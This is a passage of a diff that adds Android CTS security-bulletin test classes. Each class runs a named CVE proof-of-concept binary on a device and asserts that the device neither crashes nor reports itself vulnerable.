+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2017_13194 extends SecurityTestCase {
+
+ /**
+ * b/64710201
+ * Vulnerability Behaviour: SIGSEGV in media.codec
+ */
+ @SecurityTest(minPatchLevel = "2018-01")
+ @Test
+ public void testPocCVE_2017_13194() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media.swcodec"));
+ pocPusher.only64();
+ String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13194", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
new file mode 100644
index 0000000..6f1c03f
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9558 extends SecurityTestCase {
+
+ /**
+ * b/112161557
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2018-12")
+ @Test
+ public void testPocCVE_2018_9558() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2018-9558";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
new file mode 100644
index 0000000..ad88bb7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9561 extends SecurityTestCase {
+
+ /**
+ * b/111660010
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9561() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9561", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
new file mode 100644
index 0000000..8f8b53d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9563 extends SecurityTestCase {
+
+ /**
+ * b/114237888
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2018_9563() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9563", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
new file mode 100644
index 0000000..5d68ce6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9584.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9584 extends SecurityTestCase {
+
+ /**
+ * b/114047681
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9584() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9584", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
new file mode 100644
index 0000000..f5d19e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9585.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2018_9585 extends SecurityTestCase {
+
+ /**
+ * b/117554809
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-01")
+ @Test
+ public void testPocCVE_2018_9585() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9585", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
new file mode 100644
index 0000000..718878c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2007.java
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2007 extends SecurityTestCase {
+
+ /**
+ * b/120789744
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2007() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2007", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
new file mode 100644
index 0000000..d2f60c7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2013.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2013 extends SecurityTestCase {
+
+ /**
+ * b/120497583
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2013() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2013", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
new file mode 100644
index 0000000..c70f560
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2014.java
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2014 extends SecurityTestCase {
+
+ /**
+ * b/120499324
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2014() throws Exception {
+ pocPusher.only64();
+ String binaryName = "CVE-2019-2014";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
new file mode 100644
index 0000000..cd61170
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2019.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2019 extends SecurityTestCase {
+
+ /**
+ * b/115635871
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2019() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2019", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
new file mode 100644
index 0000000..0ac90e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2035 extends SecurityTestCase {
+
+ /**
+ * b/122320256
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2035() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2035", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
new file mode 100644
index 0000000..2619ed9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2040 extends SecurityTestCase {
+
+ /**
+ * b/122316913
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2040() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2040", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
new file mode 100644
index 0000000..6072d12
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2044 extends SecurityTestCase {
+
+ /**
+ * b/123701862
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-05")
+ @Test
+ public void testPocCVE_2019_2044() throws Exception {
+ pocPusher.only32();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2044", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java
new file mode 100644
index 0000000..783bfa1
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2046 extends SecurityTestCase {
+
+ /**
+ * b/117556220
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-05")
+ @Test
+ public void testPocCVE_2019_2046() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runProxyAutoConfig("cve_2019_2046", "true", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
new file mode 100644
index 0000000..e20bb5c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2099 extends SecurityTestCase {
+
+ /**
+ * b/123583388
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ **/
+ @SecurityTest(minPatchLevel = "2019-06")
+ @Test
+ public void testPocCVE_2019_2099() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2099", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
new file mode 100644
index 0000000..38c8be0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2115 extends SecurityTestCase {
+
+ /**
+ * b/129768470
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2019-09")
+ @Test
+ public void testPocCVE_2019_2115() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2115", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
new file mode 100644
index 0000000..6833243
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
@@ -0,0 +1,40 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2135 extends SecurityTestCase {
+
+ /**
+ * b/125900276
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-08")
+ @Test
+ public void testPocCVE_2019_2135() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
new file mode 100644
index 0000000..20396ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2206 extends SecurityTestCase {
+
+ /**
+ * b/139188579
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2206() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2206", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
new file mode 100644
index 0000000..6f4340c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2207 extends SecurityTestCase {
+
+ /**
+ * b/124524315
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2207() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2207", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
new file mode 100644
index 0000000..efd1e54
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0006 extends SecurityTestCase {
+
+ /**
+ * b/139738828
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-01")
+ @Test
+ public void testPocCVE_2020_0006() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0006", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
new file mode 100644
